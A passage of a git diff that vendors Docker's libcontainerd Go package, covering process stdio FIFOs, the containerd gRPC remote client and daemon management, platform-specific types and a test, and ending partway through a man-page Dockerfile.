+ dir string +} + +func (p *process) openFifos(ctx context.Context, terminal bool) (pipe *IOPipe, err error) { + if err := os.MkdirAll(p.dir, 0700); err != nil { + return nil, err + } + + io := &IOPipe{} + + io.Stdin, err = fifo.OpenFifo(ctx, p.fifo(unix.Stdin), unix.O_WRONLY|unix.O_CREAT|unix.O_NONBLOCK, 0700) + if err != nil { + return nil, err + } + + defer func() { + if err != nil { + io.Stdin.Close() + } + }() + + io.Stdout, err = fifo.OpenFifo(ctx, p.fifo(unix.Stdout), unix.O_RDONLY|unix.O_CREAT|unix.O_NONBLOCK, 0700) + if err != nil { + return nil, err + } + + defer func() { + if err != nil { + io.Stdout.Close() + } + }() + + if goruntime.GOOS == "solaris" || !terminal { + // For Solaris terminal handling is done exclusively by the runtime therefore we make no distinction + // in the processing for terminal and !terminal cases. + io.Stderr, err = fifo.OpenFifo(ctx, p.fifo(unix.Stderr), unix.O_RDONLY|unix.O_CREAT|unix.O_NONBLOCK, 0700) + if err != nil { + return nil, err + } + defer func() { + if err != nil { + io.Stderr.Close() + } + }() + } else { + io.Stderr = ioutil.NopCloser(emptyReader{}) + } + + return io, nil +} + +func (p *process) sendCloseStdin() error { + _, err := p.client.remote.apiClient.UpdateProcess(context.Background(), &containerd.UpdateProcessRequest{ + Id: p.containerID, + Pid: p.friendlyName, + CloseStdin: true, + }) + if err != nil && (strings.Contains(err.Error(), "container not found") || strings.Contains(err.Error(), "process not found")) { + return nil + } + return err +} + +func (p *process) closeFifos(io *IOPipe) { + io.Stdin.Close() + io.Stdout.Close() + io.Stderr.Close() +} + +type emptyReader struct{} + +func (r emptyReader) Read(b []byte) (int, error) { + return 0, io.EOF +} + +func (p *process) fifo(index int) string { + return filepath.Join(p.dir, p.friendlyName+"-"+fdNames[index]) +} diff --git a/vendor/github.com/docker/docker/libcontainerd/process_windows.go 
b/vendor/github.com/docker/docker/libcontainerd/process_windows.go new file mode 100644 index 0000000000..57ecc948d0 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/process_windows.go @@ -0,0 +1,51 @@ +package libcontainerd + +import ( + "io" + "sync" + + "github.com/Microsoft/hcsshim" + "github.com/docker/docker/pkg/ioutils" +) + +// process keeps the state for both main container process and exec process. +type process struct { + processCommon + + // Platform specific fields are below here. + + // commandLine is to support returning summary information for docker top + commandLine string + hcsProcess hcsshim.Process +} + +type autoClosingReader struct { + io.ReadCloser + sync.Once +} + +func (r *autoClosingReader) Read(b []byte) (n int, err error) { + n, err = r.ReadCloser.Read(b) + if err == io.EOF { + r.Once.Do(func() { r.ReadCloser.Close() }) + } + return +} + +func createStdInCloser(pipe io.WriteCloser, process hcsshim.Process) io.WriteCloser { + return ioutils.NewWriteCloserWrapper(pipe, func() error { + if err := pipe.Close(); err != nil { + return err + } + + err := process.CloseStdin() + if err != nil && !hcsshim.IsNotExist(err) && !hcsshim.IsAlreadyClosed(err) { + // This error will occur if the compute system is currently shutting down + if perr, ok := err.(*hcsshim.ProcessError); ok && perr.Err != hcsshim.ErrVmcomputeOperationInvalidState { + return err + } + } + + return nil + }) +} diff --git a/vendor/github.com/docker/docker/libcontainerd/queue_unix.go b/vendor/github.com/docker/docker/libcontainerd/queue_unix.go new file mode 100644 index 0000000000..b848b9872b --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/queue_unix.go @@ -0,0 +1,31 @@ +// +build linux solaris + +package libcontainerd + +import "sync" + +type queue struct { + sync.Mutex + fns map[string]chan struct{} +} + +func (q *queue) append(id string, f func()) { + q.Lock() + defer q.Unlock() + + if q.fns == nil { + q.fns = make(map[string]chan struct{}) 
+ } + + done := make(chan struct{}) + + fn, ok := q.fns[id] + q.fns[id] = done + go func() { + if ok { + <-fn + } + f() + close(done) + }() +} diff --git a/vendor/github.com/docker/docker/libcontainerd/remote.go b/vendor/github.com/docker/docker/libcontainerd/remote.go new file mode 100644 index 0000000000..9031e3ae7d --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/remote.go @@ -0,0 +1,20 @@ +package libcontainerd + +// Remote on Linux defines the accesspoint to the containerd grpc API. +// Remote on Windows is largely an unimplemented interface as there is +// no remote containerd. +type Remote interface { + // Client returns a new Client instance connected with given Backend. + Client(Backend) (Client, error) + // Cleanup stops containerd if it was started by libcontainerd. + // Note this is not used on Windows as there is no remote containerd. + Cleanup() + // UpdateOptions allows various remote options to be updated at runtime. + UpdateOptions(...RemoteOption) error +} + +// RemoteOption allows to configure parameters of remotes. +// This is unused on Windows. 
+type RemoteOption interface { + Apply(Remote) error +} diff --git a/vendor/github.com/docker/docker/libcontainerd/remote_unix.go b/vendor/github.com/docker/docker/libcontainerd/remote_unix.go new file mode 100644 index 0000000000..64a28646be --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/remote_unix.go @@ -0,0 +1,544 @@ +// +build linux solaris + +package libcontainerd + +import ( + "fmt" + "io" + "io/ioutil" + "log" + "net" + "os" + "os/exec" + "path/filepath" + goruntime "runtime" + "strconv" + "strings" + "sync" + "syscall" + "time" + + "github.com/Sirupsen/logrus" + containerd "github.com/docker/containerd/api/grpc/types" + "github.com/docker/docker/pkg/locker" + sysinfo "github.com/docker/docker/pkg/system" + "github.com/docker/docker/utils" + "github.com/golang/protobuf/ptypes" + "github.com/golang/protobuf/ptypes/timestamp" + "golang.org/x/net/context" + "google.golang.org/grpc" + "google.golang.org/grpc/grpclog" + "google.golang.org/grpc/health/grpc_health_v1" + "google.golang.org/grpc/transport" +) + +const ( + maxConnectionRetryCount = 3 + containerdHealthCheckTimeout = 3 * time.Second + containerdShutdownTimeout = 15 * time.Second + containerdBinary = "docker-containerd" + containerdPidFilename = "docker-containerd.pid" + containerdSockFilename = "docker-containerd.sock" + containerdStateDir = "containerd" + eventTimestampFilename = "event.ts" +) + +type remote struct { + sync.RWMutex + apiClient containerd.APIClient + daemonPid int + stateDir string + rpcAddr string + startDaemon bool + closeManually bool + debugLog bool + rpcConn *grpc.ClientConn + clients []*client + eventTsPath string + runtime string + runtimeArgs []string + daemonWaitCh chan struct{} + liveRestore bool + oomScore int + restoreFromTimestamp *timestamp.Timestamp +} + +// New creates a fresh instance of libcontainerd remote. 
+func New(stateDir string, options ...RemoteOption) (_ Remote, err error) { + defer func() { + if err != nil { + err = fmt.Errorf("Failed to connect to containerd. Please make sure containerd is installed in your PATH or you have specified the correct address. Got error: %v", err) + } + }() + r := &remote{ + stateDir: stateDir, + daemonPid: -1, + eventTsPath: filepath.Join(stateDir, eventTimestampFilename), + } + for _, option := range options { + if err := option.Apply(r); err != nil { + return nil, err + } + } + + if err := sysinfo.MkdirAll(stateDir, 0700); err != nil { + return nil, err + } + + if r.rpcAddr == "" { + r.rpcAddr = filepath.Join(stateDir, containerdSockFilename) + } + + if r.startDaemon { + if err := r.runContainerdDaemon(); err != nil { + return nil, err + } + } + + // don't output the grpc reconnect logging + grpclog.SetLogger(log.New(ioutil.Discard, "", log.LstdFlags)) + dialOpts := append([]grpc.DialOption{grpc.WithInsecure()}, + grpc.WithDialer(func(addr string, timeout time.Duration) (net.Conn, error) { + return net.DialTimeout("unix", addr, timeout) + }), + ) + conn, err := grpc.Dial(r.rpcAddr, dialOpts...) 
+ if err != nil { + return nil, fmt.Errorf("error connecting to containerd: %v", err) + } + + r.rpcConn = conn + r.apiClient = containerd.NewAPIClient(conn) + + // Get the timestamp to restore from + t := r.getLastEventTimestamp() + tsp, err := ptypes.TimestampProto(t) + if err != nil { + logrus.Errorf("libcontainerd: failed to convert timestamp: %q", err) + } + r.restoreFromTimestamp = tsp + + go r.handleConnectionChange() + + if err := r.startEventsMonitor(); err != nil { + return nil, err + } + + return r, nil +} + +func (r *remote) UpdateOptions(options ...RemoteOption) error { + for _, option := range options { + if err := option.Apply(r); err != nil { + return err + } + } + return nil +} + +func (r *remote) handleConnectionChange() { + var transientFailureCount = 0 + + ticker := time.NewTicker(500 * time.Millisecond) + defer ticker.Stop() + healthClient := grpc_health_v1.NewHealthClient(r.rpcConn) + + for { + <-ticker.C + ctx, cancel := context.WithTimeout(context.Background(), containerdHealthCheckTimeout) + _, err := healthClient.Check(ctx, &grpc_health_v1.HealthCheckRequest{}) + cancel() + if err == nil { + continue + } + + logrus.Debugf("libcontainerd: containerd health check returned error: %v", err) + + if r.daemonPid != -1 { + if strings.Contains(err.Error(), "is closing") { + // Well, we asked for it to stop, just return + return + } + // all other errors are transient + // Reset state to be notified of next failure + transientFailureCount++ + if transientFailureCount >= maxConnectionRetryCount { + transientFailureCount = 0 + if utils.IsProcessAlive(r.daemonPid) { + utils.KillProcess(r.daemonPid) + } + <-r.daemonWaitCh + if err := r.runContainerdDaemon(); err != nil { //FIXME: Handle error + logrus.Errorf("libcontainerd: error restarting containerd: %v", err) + } + continue + } + } + } +} + +func (r *remote) Cleanup() { + if r.daemonPid == -1 { + return + } + r.closeManually = true + r.rpcConn.Close() + // Ask the daemon to quit + 
syscall.Kill(r.daemonPid, syscall.SIGTERM) + + // Wait up to 15secs for it to stop + for i := time.Duration(0); i < containerdShutdownTimeout; i += time.Second { + if !utils.IsProcessAlive(r.daemonPid) { + break + } + time.Sleep(time.Second) + } + + if utils.IsProcessAlive(r.daemonPid) { + logrus.Warnf("libcontainerd: containerd (%d) didn't stop within 15 secs, killing it\n", r.daemonPid) + syscall.Kill(r.daemonPid, syscall.SIGKILL) + } + + // cleanup some files + os.Remove(filepath.Join(r.stateDir, containerdPidFilename)) + os.Remove(filepath.Join(r.stateDir, containerdSockFilename)) +} + +func (r *remote) Client(b Backend) (Client, error) { + c := &client{ + clientCommon: clientCommon{ + backend: b, + containers: make(map[string]*container), + locker: locker.New(), + }, + remote: r, + exitNotifiers: make(map[string]*exitNotifier), + liveRestore: r.liveRestore, + } + + r.Lock() + r.clients = append(r.clients, c) + r.Unlock() + return c, nil +} + +func (r *remote) updateEventTimestamp(t time.Time) { + f, err := os.OpenFile(r.eventTsPath, syscall.O_CREAT|syscall.O_WRONLY|syscall.O_TRUNC, 0600) + if err != nil { + logrus.Warnf("libcontainerd: failed to open event timestamp file: %v", err) + return + } + defer f.Close() + + b, err := t.MarshalText() + if err != nil { + logrus.Warnf("libcontainerd: failed to encode timestamp: %v", err) + return + } + + n, err := f.Write(b) + if err != nil || n != len(b) { + logrus.Warnf("libcontainerd: failed to update event timestamp file: %v", err) + f.Truncate(0) + return + } +} + +func (r *remote) getLastEventTimestamp() time.Time { + t := time.Now() + + fi, err := os.Stat(r.eventTsPath) + if os.IsNotExist(err) || fi.Size() == 0 { + return t + } + + f, err := os.Open(r.eventTsPath) + if err != nil { + logrus.Warnf("libcontainerd: Unable to access last event ts: %v", err) + return t + } + defer f.Close() + + b := make([]byte, fi.Size()) + n, err := f.Read(b) + if err != nil || n != len(b) { + logrus.Warnf("libcontainerd: Unable to 
read last event ts: %v", err) + return t + } + + t.UnmarshalText(b) + + return t +} + +func (r *remote) startEventsMonitor() error { + // First, get past events + t := r.getLastEventTimestamp() + tsp, err := ptypes.TimestampProto(t) + if err != nil { + logrus.Errorf("libcontainerd: failed to convert timestamp: %q", err) + } + er := &containerd.EventsRequest{ + Timestamp: tsp, + } + events, err := r.apiClient.Events(context.Background(), er, grpc.FailFast(false)) + if err != nil { + return err + } + go r.handleEventStream(events) + return nil +} + +func (r *remote) handleEventStream(events containerd.API_EventsClient) { + for { + e, err := events.Recv() + if err != nil { + if grpc.ErrorDesc(err) == transport.ErrConnClosing.Desc && + r.closeManually { + // ignore error if grpc remote connection is closed manually + return + } + logrus.Errorf("libcontainerd: failed to receive event from containerd: %v", err) + go r.startEventsMonitor() + return + } + + logrus.Debugf("libcontainerd: received containerd event: %#v", e) + + var container *container + var c *client + r.RLock() + for _, c = range r.clients { + container, err = c.getContainer(e.Id) + if err == nil { + break + } + } + r.RUnlock() + if container == nil { + logrus.Warnf("libcontainerd: unknown container %s", e.Id) + continue + } + + if err := container.handleEvent(e); err != nil { + logrus.Errorf("libcontainerd: error processing state change for %s: %v", e.Id, err) + } + + tsp, err := ptypes.Timestamp(e.Timestamp) + if err != nil { + logrus.Errorf("libcontainerd: failed to convert event timestamp: %q", err) + continue + } + + r.updateEventTimestamp(tsp) + } +} + +func (r *remote) runContainerdDaemon() error { + pidFilename := filepath.Join(r.stateDir, containerdPidFilename) + f, err := os.OpenFile(pidFilename, os.O_RDWR|os.O_CREATE, 0600) + if err != nil { + return err + } + defer f.Close() + + // File exist, check if the daemon is alive + b := make([]byte, 8) + n, err := f.Read(b) + if err != nil && err != 
io.EOF { + return err + } + + if n > 0 { + pid, err := strconv.ParseUint(string(b[:n]), 10, 64) + if err != nil { + return err + } + if utils.IsProcessAlive(int(pid)) { + logrus.Infof("libcontainerd: previous instance of containerd still alive (%d)", pid) + r.daemonPid = int(pid) + return nil + } + } + + // rewind the file + _, err = f.Seek(0, os.SEEK_SET) + if err != nil { + return err + } + + // Truncate it + err = f.Truncate(0) + if err != nil { + return err + } + + // Start a new instance + args := []string{ + "-l", fmt.Sprintf("unix://%s", r.rpcAddr), + "--metrics-interval=0", + "--start-timeout", "2m", + "--state-dir", filepath.Join(r.stateDir, containerdStateDir), + } + if goruntime.GOOS == "solaris" { + args = append(args, "--shim", "containerd-shim", "--runtime", "runc") + } else { + args = append(args, "--shim", "docker-containerd-shim") + if r.runtime != "" { + args = append(args, "--runtime") + args = append(args, r.runtime) + } + } + if r.debugLog { + args = append(args, "--debug") + } + if len(r.runtimeArgs) > 0 { + for _, v := range r.runtimeArgs { + args = append(args, "--runtime-args") + args = append(args, v) + } + logrus.Debugf("libcontainerd: runContainerdDaemon: runtimeArgs: %s", args) + } + + cmd := exec.Command(containerdBinary, args...) 
+ // redirect containerd logs to docker logs + cmd.Stdout = os.Stdout + cmd.Stderr = os.Stderr + cmd.SysProcAttr = setSysProcAttr(true) + cmd.Env = nil + // clear the NOTIFY_SOCKET from the env when starting containerd + for _, e := range os.Environ() { + if !strings.HasPrefix(e, "NOTIFY_SOCKET") { + cmd.Env = append(cmd.Env, e) + } + } + if err := cmd.Start(); err != nil { + return err + } + logrus.Infof("libcontainerd: new containerd process, pid: %d", cmd.Process.Pid) + if err := setOOMScore(cmd.Process.Pid, r.oomScore); err != nil { + utils.KillProcess(cmd.Process.Pid) + return err + } + if _, err := f.WriteString(fmt.Sprintf("%d", cmd.Process.Pid)); err != nil { + utils.KillProcess(cmd.Process.Pid) + return err + } + + r.daemonWaitCh = make(chan struct{}) + go func() { + cmd.Wait() + close(r.daemonWaitCh) + }() // Reap our child when needed + r.daemonPid = cmd.Process.Pid + return nil +} + +// WithRemoteAddr sets the external containerd socket to connect to. +func WithRemoteAddr(addr string) RemoteOption { + return rpcAddr(addr) +} + +type rpcAddr string + +func (a rpcAddr) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.rpcAddr = string(a) + return nil + } + return fmt.Errorf("WithRemoteAddr option not supported for this remote") +} + +// WithRuntimePath sets the path of the runtime to be used as the +// default by containerd +func WithRuntimePath(rt string) RemoteOption { + return runtimePath(rt) +} + +type runtimePath string + +func (rt runtimePath) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.runtime = string(rt) + return nil + } + return fmt.Errorf("WithRuntime option not supported for this remote") +} + +// WithRuntimeArgs sets the list of runtime args passed to containerd +func WithRuntimeArgs(args []string) RemoteOption { + return runtimeArgs(args) +} + +type runtimeArgs []string + +func (rt runtimeArgs) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.runtimeArgs = rt + return nil + } 
+ return fmt.Errorf("WithRuntimeArgs option not supported for this remote") +} + +// WithStartDaemon defines if libcontainerd should also run containerd daemon. +func WithStartDaemon(start bool) RemoteOption { + return startDaemon(start) +} + +type startDaemon bool + +func (s startDaemon) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.startDaemon = bool(s) + return nil + } + return fmt.Errorf("WithStartDaemon option not supported for this remote") +} + +// WithDebugLog defines if containerd debug logs will be enabled for daemon. +func WithDebugLog(debug bool) RemoteOption { + return debugLog(debug) +} + +type debugLog bool + +func (d debugLog) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.debugLog = bool(d) + return nil + } + return fmt.Errorf("WithDebugLog option not supported for this remote") +} + +// WithLiveRestore defines if containers are stopped on shutdown or restored. +func WithLiveRestore(v bool) RemoteOption { + return liveRestore(v) +} + +type liveRestore bool + +func (l liveRestore) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.liveRestore = bool(l) + for _, c := range remote.clients { + c.liveRestore = bool(l) + } + return nil + } + return fmt.Errorf("WithLiveRestore option not supported for this remote") +} + +// WithOOMScore defines the oom_score_adj to set for the containerd process. 
+func WithOOMScore(score int) RemoteOption { + return oomScore(score) +} + +type oomScore int + +func (o oomScore) Apply(r Remote) error { + if remote, ok := r.(*remote); ok { + remote.oomScore = int(o) + return nil + } + return fmt.Errorf("WithOOMScore option not supported for this remote") +} diff --git a/vendor/github.com/docker/docker/libcontainerd/remote_windows.go b/vendor/github.com/docker/docker/libcontainerd/remote_windows.go new file mode 100644 index 0000000000..74c10447bb --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/remote_windows.go @@ -0,0 +1,36 @@ +package libcontainerd + +import "github.com/docker/docker/pkg/locker" + +type remote struct { +} + +func (r *remote) Client(b Backend) (Client, error) { + c := &client{ + clientCommon: clientCommon{ + backend: b, + containers: make(map[string]*container), + locker: locker.New(), + }, + } + return c, nil +} + +// Cleanup is a no-op on Windows. It is here to implement the interface. +func (r *remote) Cleanup() { +} + +func (r *remote) UpdateOptions(opts ...RemoteOption) error { + return nil +} + +// New creates a fresh instance of libcontainerd remote. On Windows, +// this is not used as there is no remote containerd process. +func New(_ string, _ ...RemoteOption) (Remote, error) { + return &remote{}, nil +} + +// WithLiveRestore is a noop on windows. +func WithLiveRestore(v bool) RemoteOption { + return nil +} diff --git a/vendor/github.com/docker/docker/libcontainerd/types.go b/vendor/github.com/docker/docker/libcontainerd/types.go new file mode 100644 index 0000000000..3d981e3371 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/types.go @@ -0,0 +1,75 @@ +package libcontainerd + +import ( + "io" + + containerd "github.com/docker/containerd/api/grpc/types" + "github.com/opencontainers/runtime-spec/specs-go" + "golang.org/x/net/context" +) + +// State constants used in state change reporting. 
+const ( + StateStart = "start-container" + StatePause = "pause" + StateResume = "resume" + StateExit = "exit" + StateRestore = "restore" + StateExitProcess = "exit-process" + StateOOM = "oom" // fake state +) + +// CommonStateInfo contains the state info common to all platforms. +type CommonStateInfo struct { // FIXME: event? + State string + Pid uint32 + ExitCode uint32 + ProcessID string +} + +// Backend defines callbacks that the client of the library needs to implement. +type Backend interface { + StateChanged(containerID string, state StateInfo) error +} + +// Client provides access to containerd features. +type Client interface { + GetServerVersion(ctx context.Context) (*ServerVersion, error) + Create(containerID string, checkpoint string, checkpointDir string, spec specs.Spec, attachStdio StdioCallback, options ...CreateOption) error + Signal(containerID string, sig int) error + SignalProcess(containerID string, processFriendlyName string, sig int) error + AddProcess(ctx context.Context, containerID, processFriendlyName string, process Process, attachStdio StdioCallback) (int, error) + Resize(containerID, processFriendlyName string, width, height int) error + Pause(containerID string) error + Resume(containerID string) error + Restore(containerID string, attachStdio StdioCallback, options ...CreateOption) error + Stats(containerID string) (*Stats, error) + GetPidsForContainer(containerID string) ([]int, error) + Summary(containerID string) ([]Summary, error) + UpdateResources(containerID string, resources Resources) error + CreateCheckpoint(containerID string, checkpointID string, checkpointDir string, exit bool) error + DeleteCheckpoint(containerID string, checkpointID string, checkpointDir string) error + ListCheckpoints(containerID string, checkpointDir string) (*Checkpoints, error) +} + +// CreateOption allows to configure parameters of container creation. 
+type CreateOption interface { + Apply(interface{}) error +} + +// StdioCallback is called to connect a container or process stdio. +type StdioCallback func(IOPipe) error + +// IOPipe contains the stdio streams. +type IOPipe struct { + Stdin io.WriteCloser + Stdout io.ReadCloser + Stderr io.ReadCloser + Terminal bool // Whether stderr is connected on Windows +} + +// ServerVersion contains version information as retrieved from the +// server +type ServerVersion struct { + containerd.GetServerVersionResponse +} diff --git a/vendor/github.com/docker/docker/libcontainerd/types_linux.go b/vendor/github.com/docker/docker/libcontainerd/types_linux.go new file mode 100644 index 0000000000..cc2a17aec6 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/types_linux.go @@ -0,0 +1,49 @@ +package libcontainerd + +import ( + containerd "github.com/docker/containerd/api/grpc/types" + "github.com/opencontainers/runtime-spec/specs-go" +) + +// Process contains information to start a specific application inside the container. +type Process struct { + // Terminal creates an interactive terminal for the container. + Terminal bool `json:"terminal"` + // User specifies user information for the process. + User *specs.User `json:"user"` + // Args specifies the binary and arguments for the application to execute. + Args []string `json:"args"` + // Env populates the process environment for the process. + Env []string `json:"env,omitempty"` + // Cwd is the current working directory for the process and must be + // relative to the container's root. + Cwd *string `json:"cwd"` + // Capabilities are linux capabilities that are kept for the container. + Capabilities []string `json:"capabilities,omitempty"` + // Rlimits specifies rlimit options to apply to the process. + Rlimits []specs.Rlimit `json:"rlimits,omitempty"` + // ApparmorProfile specifies the apparmor profile for the container. 
+ ApparmorProfile *string `json:"apparmorProfile,omitempty"` + // SelinuxLabel specifies the selinux context that the container process is run as. + SelinuxLabel *string `json:"selinuxLabel,omitempty"` +} + +// StateInfo contains description about the new state container has entered. +type StateInfo struct { + CommonStateInfo + + // Platform specific StateInfo + OOMKilled bool +} + +// Stats contains a stats properties from containerd. +type Stats containerd.StatsResponse + +// Summary contains a container summary from containerd +type Summary struct{} + +// Resources defines updatable container resource values. +type Resources containerd.UpdateResource + +// Checkpoints contains the details of a checkpoint +type Checkpoints containerd.ListCheckpointResponse diff --git a/vendor/github.com/docker/docker/libcontainerd/types_solaris.go b/vendor/github.com/docker/docker/libcontainerd/types_solaris.go new file mode 100644 index 0000000000..dbafef669f --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/types_solaris.go @@ -0,0 +1,43 @@ +package libcontainerd + +import ( + containerd "github.com/docker/containerd/api/grpc/types" + "github.com/opencontainers/runtime-spec/specs-go" +) + +// Process contains information to start a specific application inside the container. +type Process struct { + // Terminal creates an interactive terminal for the container. + Terminal bool `json:"terminal"` + // User specifies user information for the process. + User *specs.User `json:"user"` + // Args specifies the binary and arguments for the application to execute. + Args []string `json:"args"` + // Env populates the process environment for the process. + Env []string `json:"env,omitempty"` + // Cwd is the current working directory for the process and must be + // relative to the container's root. + Cwd *string `json:"cwd"` + // Capabilities are linux capabilities that are kept for the container. 
+ Capabilities []string `json:"capabilities,omitempty"` +} + +// Stats contains a stats properties from containerd. +type Stats struct{} + +// Summary contains a container summary from containerd +type Summary struct{} + +// StateInfo contains description about the new state container has entered. +type StateInfo struct { + CommonStateInfo + + // Platform specific StateInfo + OOMKilled bool +} + +// Resources defines updatable container resource values. +type Resources struct{} + +// Checkpoints contains the details of a checkpoint +type Checkpoints containerd.ListCheckpointResponse diff --git a/vendor/github.com/docker/docker/libcontainerd/types_windows.go b/vendor/github.com/docker/docker/libcontainerd/types_windows.go new file mode 100644 index 0000000000..24a9a96440 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/types_windows.go @@ -0,0 +1,79 @@ +package libcontainerd + +import ( + "github.com/Microsoft/hcsshim" + "github.com/opencontainers/runtime-spec/specs-go" +) + +// Process contains information to start a specific application inside the container. +type Process specs.Process + +// Summary contains a ProcessList item from HCS to support `top` +type Summary hcsshim.ProcessListItem + +// StateInfo contains description about the new state container has entered. +type StateInfo struct { + CommonStateInfo + + // Platform specific StateInfo + + UpdatePending bool // Indicates that there are some update operations pending that should be completed by a servicing container. +} + +// Stats contains statics from HCS +type Stats hcsshim.Statistics + +// Resources defines updatable container resource values. +type Resources struct{} + +// ServicingOption is a CreateOption with a no-op application that signifies +// the container needs to be used for a Windows servicing operation. 
+type ServicingOption struct { + IsServicing bool +} + +// FlushOption is a CreateOption that signifies if the container should be +// started with flushes ignored until boot has completed. This is an optimisation +// for first boot of a container. +type FlushOption struct { + IgnoreFlushesDuringBoot bool +} + +// HyperVIsolationOption is a CreateOption that indicates whether the runtime +// should start the container as a Hyper-V container, and if so, the sandbox path. +type HyperVIsolationOption struct { + IsHyperV bool + SandboxPath string `json:",omitempty"` +} + +// LayerOption is a CreateOption that indicates to the runtime the layer folder +// and layer paths for a container. +type LayerOption struct { + // LayerFolder is the path to the current layer folder. Empty for Hyper-V containers. + LayerFolderPath string `json:",omitempty"` + // Layer paths of the parent layers + LayerPaths []string +} + +// NetworkEndpointsOption is a CreateOption that provides the runtime list +// of network endpoints to which a container should be attached during its creation. 
+type NetworkEndpointsOption struct { + Endpoints []string + AllowUnqualifiedDNSQuery bool +} + +// CredentialsOption is a CreateOption that indicates the credentials from +// a credential spec to be used to the runtime +type CredentialsOption struct { + Credentials string +} + +// Checkpoint holds the details of a checkpoint (not supported in windows) +type Checkpoint struct { + Name string +} + +// Checkpoints contains the details of a checkpoint +type Checkpoints struct { + Checkpoints []*Checkpoint +} diff --git a/vendor/github.com/docker/docker/libcontainerd/utils_linux.go b/vendor/github.com/docker/docker/libcontainerd/utils_linux.go new file mode 100644 index 0000000000..78828bcdad --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/utils_linux.go @@ -0,0 +1,62 @@ +package libcontainerd + +import ( + "syscall" + + containerd "github.com/docker/containerd/api/grpc/types" + "github.com/opencontainers/runtime-spec/specs-go" +) + +func getRootIDs(s specs.Spec) (int, int, error) { + var hasUserns bool + for _, ns := range s.Linux.Namespaces { + if ns.Type == specs.UserNamespace { + hasUserns = true + break + } + } + if !hasUserns { + return 0, 0, nil + } + uid := hostIDFromMap(0, s.Linux.UIDMappings) + gid := hostIDFromMap(0, s.Linux.GIDMappings) + return uid, gid, nil +} + +func hostIDFromMap(id uint32, mp []specs.IDMapping) int { + for _, m := range mp { + if id >= m.ContainerID && id <= m.ContainerID+m.Size-1 { + return int(m.HostID + id - m.ContainerID) + } + } + return 0 +} + +func systemPid(ctr *containerd.Container) uint32 { + var pid uint32 + for _, p := range ctr.Processes { + if p.Pid == InitFriendlyName { + pid = p.SystemPid + } + } + return pid +} + +func convertRlimits(sr []specs.Rlimit) (cr []*containerd.Rlimit) { + for _, r := range sr { + cr = append(cr, &containerd.Rlimit{ + Type: r.Type, + Hard: r.Hard, + Soft: r.Soft, + }) + } + return +} + +// setPDeathSig sets the parent death signal to SIGKILL +func setSysProcAttr(sid bool) 
*syscall.SysProcAttr { + return &syscall.SysProcAttr{ + Setsid: sid, + Pdeathsig: syscall.SIGKILL, + } +} diff --git a/vendor/github.com/docker/docker/libcontainerd/utils_solaris.go b/vendor/github.com/docker/docker/libcontainerd/utils_solaris.go new file mode 100644 index 0000000000..49632b45e5 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/utils_solaris.go @@ -0,0 +1,27 @@ +package libcontainerd + +import ( + "syscall" + + containerd "github.com/docker/containerd/api/grpc/types" + "github.com/opencontainers/runtime-spec/specs-go" +) + +func getRootIDs(s specs.Spec) (int, int, error) { + return 0, 0, nil +} + +func systemPid(ctr *containerd.Container) uint32 { + var pid uint32 + for _, p := range ctr.Processes { + if p.Pid == InitFriendlyName { + pid = p.SystemPid + } + } + return pid +} + +// setPDeathSig sets the parent death signal to SIGKILL +func setSysProcAttr(sid bool) *syscall.SysProcAttr { + return nil +} diff --git a/vendor/github.com/docker/docker/libcontainerd/utils_windows.go b/vendor/github.com/docker/docker/libcontainerd/utils_windows.go new file mode 100644 index 0000000000..41ac40d2c2 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/utils_windows.go @@ -0,0 +1,46 @@ +package libcontainerd + +import "strings" + +// setupEnvironmentVariables converts a string array of environment variables +// into a map as required by the HCS. Source array is in format [v1=k1] [v2=k2] etc. +func setupEnvironmentVariables(a []string) map[string]string { + r := make(map[string]string) + for _, s := range a { + arr := strings.SplitN(s, "=", 2) + if len(arr) == 2 { + r[arr[0]] = arr[1] + } + } + return r +} + +// Apply for a servicing option is a no-op. +func (s *ServicingOption) Apply(interface{}) error { + return nil +} + +// Apply for the flush option is a no-op. +func (f *FlushOption) Apply(interface{}) error { + return nil +} + +// Apply for the hypervisolation option is a no-op. 
+func (h *HyperVIsolationOption) Apply(interface{}) error { + return nil +} + +// Apply for the layer option is a no-op. +func (h *LayerOption) Apply(interface{}) error { + return nil +} + +// Apply for the network endpoints option is a no-op. +func (s *NetworkEndpointsOption) Apply(interface{}) error { + return nil +} + +// Apply for the credentials option is a no-op. +func (s *CredentialsOption) Apply(interface{}) error { + return nil +} diff --git a/vendor/github.com/docker/docker/libcontainerd/utils_windows_test.go b/vendor/github.com/docker/docker/libcontainerd/utils_windows_test.go new file mode 100644 index 0000000000..f3679bfb71 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/utils_windows_test.go @@ -0,0 +1,13 @@ +package libcontainerd + +import ( + "testing" +) + +func TestEnvironmentParsing(t *testing.T) { + env := []string{"foo=bar", "car=hat", "a=b=c"} + result := setupEnvironmentVariables(env) + if len(result) != 3 || result["foo"] != "bar" || result["car"] != "hat" || result["a"] != "b=c" { + t.Fatalf("Expected map[foo:bar car:hat a:b=c], got %v", result) + } +} diff --git a/vendor/github.com/docker/docker/man/Dockerfile b/vendor/github.com/docker/docker/man/Dockerfile new file mode 100644 index 0000000000..80e97ff01e --- /dev/null +++ b/vendor/github.com/docker/docker/man/Dockerfile @@ -0,0 +1,24 @@ +FROM golang:1.7.5-alpine + +RUN apk add -U git bash curl gcc musl-dev make + +RUN mkdir -p /go/src /go/bin /go/pkg +RUN export GLIDE=v0.11.1; \ + export TARGET=/go/src/github.com/Masterminds; \ + mkdir -p ${TARGET} && \ + git clone 